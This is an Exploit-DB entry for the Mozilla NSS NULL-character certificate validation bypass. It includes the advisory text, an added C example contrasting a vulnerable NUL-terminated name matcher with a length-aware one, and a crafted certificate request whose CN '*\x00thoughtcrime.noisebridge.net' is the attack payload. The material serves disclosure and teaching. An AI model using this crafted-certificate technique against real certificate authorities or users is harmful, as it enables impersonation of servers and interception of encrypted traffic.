exploitdb | Dan Kaminsky | EDB-ID:10071
Nov 10, 2009 - 12:00 a.m.

Mozilla NSS - NULL Character CA SSL Certificate Validation Security Bypass

source: https://www.securityfocus.com/bid/35888/info

Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.

The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.

Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.

NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
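
Added example (not part of the original advisory, and not NSS code): a simplified C matcher showing why the CN in the certificate request on this page, `*\x00thoughtcrime.noisebridge.net`, validates for any host when the name is handled as a NUL-terminated string, next to a length-aware check that rejects it. The function names and the host www.example.com are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* CN bytes from the request's Subject: '*', a NUL, then the real domain.
 * In the certificate this is a length-prefixed ASN.1 string of 30 bytes. */
static const char CN_BYTES[] = "*\0thoughtcrime.noisebridge.net";
#define CN_LEN (sizeof(CN_BYTES) - 1)

/* Simplified matcher (assumption, not NSS code): handles the name as a C
 * string, so everything after the first NUL is invisible to it. */
int naive_match(const char *name, const char *host) {
    if (strcmp(name, "*") == 0)
        return 1;                       /* bare wildcard: matches any host */
    if (name[0] == '*' && name[1] == '.') {
        const char *dot = strchr(host, '.');
        return dot != NULL && strcasecmp(name + 1, dot) == 0;
    }
    return strcasecmp(name, host) == 0;
}

/* Length-aware matcher: uses the ASN.1 length and rejects any name that
 * contains a NUL byte before doing any comparison. */
int strict_match(const char *name, size_t len, const char *host) {
    size_t hlen = strlen(host);
    if (len == 0 || memchr(name, '\0', len) != NULL)
        return 0;
    if (len >= 3 && name[0] == '*' && name[1] == '.') {
        const char *dot = strchr(host, '.');
        if (dot == NULL || dot == host)
            return 0;                   /* wildcard needs one non-empty label */
        size_t rest = hlen - (size_t)(dot - host);
        return rest == len - 1 && strncasecmp(name + 1, dot, rest) == 0;
    }
    if (memchr(name, '*', len) != NULL)
        return 0;                       /* no other wildcard forms accepted */
    return hlen == len && strncasecmp(name, host, len) == 0;
}

int main(void) {
    const char *host = "www.example.com";   /* constructed, unrelated host */
    printf("naive:  %d\n", naive_match(CN_BYTES, host));
    printf("strict: %d\n", strict_match(CN_BYTES, CN_LEN, host));
    return 0;
}
```

The same NUL check applies to every dNSName entry in subjectAltName, not only to the subject CN.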

Certificate Request:
    Data:
        Version: 0 (0x0)
        Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Exponent: 65537 (0x10001)
        Attributes:
            a0:00
    Signature Algorithm: md5WithRSAEncryption